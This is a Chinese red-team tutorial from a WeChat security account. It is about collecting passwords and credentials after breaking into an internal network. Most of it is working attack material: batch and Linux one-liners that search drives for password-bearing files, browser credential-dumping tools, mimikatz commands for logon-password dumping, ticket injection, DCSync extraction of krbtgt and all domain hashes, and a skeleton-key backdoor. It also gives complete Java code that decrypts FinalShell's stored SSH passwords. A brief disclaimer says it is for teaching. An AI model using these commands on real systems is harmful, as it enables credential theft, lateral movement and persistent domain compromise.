免责声明:本篇文章仅用于技术教学,切勿进行非法测试,由于传播、利用本公众号无影安全实验室所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号无影安全实验室及作者不为此承担任何责任,一旦造成后果请自行承担!
朋友们现在只对常读和星标的公众号才展示大图推送,建议大家把"无影安全实验室"设为星标,这样更新文章也能第一时间推送!
安全文章
一、利用命令一键收集
windows命令(保存为bat执行):
dir /a /s /b d:"*.txt" dir /a /s /b d:"*.xml" dir /a /s /b d:"*.mdb" dir /a /s /b d:"*.sql" dir /a /s /b d:"*.mdf" dir /a /s /b d:"*.eml" dir /a /s /b d:"*.pst" dir /a /s /b d:"*conf*" dir /a /s /b d:"*bak*" dir /a /s /b d:"*pwd*" dir /a /s /b d:"*pass*" dir /a /s /b d:"*login*" dir /a /s /b d:"*user*"dir /a /s /b c:password.txtdir /a /s /b c:*.conf *.ini *.inc *.config dir /a /s /b c:conf.* config.* dir /a /s /b c:*.txt *.xls *.xlsx *.docx | findstr "拓扑"dir /a /s /b c:*.conf *.ini *.inc *.config | findstr "运维"dir /a /s /b c:*.txt *.xls *.xlsx *.docx | findstr "密码" >C:Users1.txtLinux命令:
find /tmp/ -type f|egrep -v "*.js"|egrep -v "*.css"|egrep -v "*.html"|egrep -v "*.htm"|egrep -v "*.woff"|egrep -v "*.jar"|egrep -v "*.java"|egrep -v "*.class"|egrep -v "*.properties"|egrep -v "*.MF"|egrep -v "*.tmp"|egrep -v "*.vm"|egrep -v "*.svn*"|egrep -v "*LICENSE*"|egrep -v "*.exe"|egrep -v "*.xml"|egrep -v "*.txt"|egrep -v "*.svg"|xargs egrep -s -i "*user:|*user=|username:|username=|*pass:|*pass=|password:|password=|passwd:|passwd=|账号:|账号:|用户名:|用户名:|密码:|密码:" --color二、常规命令进行收集
可以通过 for 循环来查找,例如查找匹配 pass ⽂件:
for /r c: %i in (pass.*,username.*) do @echo %i查找⼀个⽂件⾥有没有 user 、 pass等字段内容,就可以使⽤这条命令:(从txt文件中查找包含了user、pass内容的文件)
findstr /c:"username" /c:"password" /si *.txt三、抓取浏览器历史记录和密码凭证
推荐工具一:HackBrowserData(执行完毕会在当前目录下生成一个result文件夹,里面包含了各类浏览器的访问历史记录、保存的账号密码凭证以及对应的登录地址、下载的文件等等)
HackBrowserData(支持的浏览器)
推荐工具二:SharpDecryptPwd(支持抓取多种内网常用软件的密码凭证,例如Navicat、Xmanager、火狐、谷歌、向日葵等)
四、mimikatz抓取主机密码凭证
在windows10 / 2012r2 之后的系统版本抓不到明文
mimikatz除了抓凭证外,其它功能也很强大,以下列举一些常用命令:
privilege::debug //提升权限
sekurlsa::logonpasswords //抓取密码
kerberos::list //列出存储票据
kerberos::purge //清空存储票据
kerberos::ptt XX.XX //导入票据
lsadump::dcsync /domain:http://test.com /all /csv //获取所有域用户
lsadump::dcsync /domain:http://test.com /user:test //指定获取某个用户的hash
lsadump::dcsync /domain:http://xx.com /user:krbtgt //获取krbtgt的用户hash
misc::skeleton //添加万能密钥
五、星号密码查看器
一些软件保存了密码,但是显示为星号,我们需要拿到其明文作为字典进行横向的时候,就可以用到星号密码查看器尝试(并不是所有软件星号密码都能抓到,没辙时候,可以碰碰运气)
六、抓取Finallshell保存的凭证
首先FinalShell是一款免费的国产的集SSH工具、服务器管理、远程桌面加速的良心软件,同时支持Windows,macOS,Linux,它不单单是一个SSH工具,完整的说法应该叫一体化的的服务器,网络管理软件,在很大程度上可以免费替代XShell,是国产中不多见的良心产品,具有免费海外服务器远程桌面加速,ssh加速,双边tcp加速等功能(个人补充:这款工具很好用,Gui界面做得很好,自己也在使用,同时这款工具很多运维人员也有安装使用,因此学会获取这个Finallshell的凭证也是非常重要的!!)
连接信息存储在
C:UsersonesevenAppDataLocalfinalshellconn目录下 有多少条连接就会有多少个xxx_connect_config.json文件(用户只要勾选了记住密码,在json中就会存在password)
利用网上别人写好的代码进行离线解密:
import java.io.ByteArrayOutputStream;import java.io.DataOutputStream;import java.io.IOException;import java.math.BigInteger;import java.security.MessageDigest;import java.security.NoSuchAlgorithmException;import java.security.SecureRandom;import java.util.Base64;import java.util.Random;import javax.crypto.Cipher;import javax.crypto.SecretKey;import javax.crypto.SecretKeyFactory;import javax.crypto.spec.DESKeySpec;public class FinalShellDecodePass {public static void main(String[] args)throws Exception {System.out.println(decodePass(args[0]));}public static byte[] desDecode(byte[] data, byte[] head) throws Exception {SecureRandom sr = new SecureRandom();DESKeySpec dks = new DESKeySpec(head);SecretKeyFactory keyFactory = SecretKeyFactory.getInstance("DES");SecretKey securekey = keyFactory.generateSecret(dks);Cipher cipher = Cipher.getInstance("DES");cipher.init(2, securekey, sr);return cipher.doFinal(data);}public static String decodePass(String data) throws Exception {if (data == null) {return null;} else {String rs = "";byte[] buf = Base64.getDecoder().decode(data);byte[] head = new byte[8];System.arraycopy(buf, 0, head, 0, head.length);byte[] d = new byte[buf.length - head.length];System.arraycopy(buf, head.length, d, 0, d.length);byte[] bt = desDecode(d, ranDomKey(head));rs = new String(bt);return rs;}}static byte[] ranDomKey(byte[] head) {long ks = 3680984568597093857L / (long)(new Random((long)head[5])).nextInt(127);Random random = new Random(ks);int t = head[0];for(int i = 0; i < t; ++i) {random.nextLong();}long n = random.nextLong();Random r2 = new Random(n);long[] ld = new long[]{(long)head[4], r2.nextLong(), (long)head[7], (long)head[3], r2.nextLong(), (long)head[1], random.nextLong(), (long)head[2]};ByteArrayOutputStream bos = new ByteArrayOutputStream();DataOutputStream dos = new DataOutputStream(bos);long[] var15 = ld;int var14 = ld.length;for(int var13 = 0; var13 < var14; ++var13) {long l = var15[var13];try {dos.writeLong(l);} catch (IOException var18) {var18.printStackTrace();}}try {dos.close();} catch (IOException var17) {var17.printStackTrace();}byte[] keyData = bos.toByteArray();keyData = md5(keyData);return keyData;}public static byte[] md5(byte[] data) {String ret = null;byte[] res=null;try {MessageDigest m;m = MessageDigest.getInstance("MD5");m.update(data, 0, data.length);res=m.digest();ret = new BigInteger(1, res).toString(16);} catch (NoSuchAlgorithmException e) {e.printStackTrace();}return res;}}
成功解密
交流群,欢迎大家进群畅所欲言
红队攻防篇章将持续更新,感兴趣的小伙伴点个关注叭!!!
原文始发于微信公众号(无影安全实验室):内网穿透之-收集内网密码凭证(红队攻防篇章二)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论